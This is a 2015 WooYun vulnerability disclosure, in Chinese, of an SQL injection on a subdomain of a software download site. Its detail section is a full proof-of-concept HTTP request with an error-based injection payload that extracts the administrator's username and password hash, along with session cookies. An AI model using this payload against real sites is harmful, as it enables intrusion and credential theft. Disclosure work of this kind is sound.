当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0138511

漏洞标题:非凡软件站某分站注入漏洞(已拿到管理员密码)

相关厂商:非凡软件下载

漏洞作者: 笔墨

提交时间:2015-09-02 08:53

修复时间:2015-09-07 08:54

公开时间:2015-09-07 08:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-02: 细节已通知厂商并且等待厂商处理中
2015-09-07: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

注入

详细说明:

直接贴poc

GET //order.php?id=-@%60%27%60%20UnIon%20select%20username%20from%20%60pmw_admin%60%20where%20(select%201%20from%20(select%20count(*)%20,concat(0x7c,(select%20concat(username,0x3a,password)%20from%20pmw_admin%20limit%200,1),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%20and%20id=@%60%27%60 HTTP/1.1
Host: mag.crsky.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: Hm_lvt_48c5a9172e5b4c5967d8eb7d5f6e7251=1421317519; Hm_lpvt_48c5a9172e5b4c5967d8eb7d5f6e7251=1421317576; CNZZDATA4848588=cnzz_eid%3D639238698-1421316494-%26ntime%3D1421316494; PHPSESSID=2fdac0499b4c349e25e1809eb94779a9; username=66e3QjWofojssg7lwWPp3g6lsfwSs%2BT2rm1CDU%2FmNHlvR42FTVA; lastlogintime=aff2jHVH0J6UAKwRxQm%2F7zaseps6HF9bR5merUIDdVtDF2NatFtN; lastloginip=e0e2EvrS2jQ2buvFSiICuLNaCA3NxvRQkYGWdUUNbsrF7ws%2BK7lEthq5KA; shoppingcart=a
Connection: keep-alive

漏洞证明:

QQ截图20150902083558.png

修复方案:

过滤或者关闭这个无关紧要的站。

版权声明:转载请注明来源 笔墨@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-09-07 08:54

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无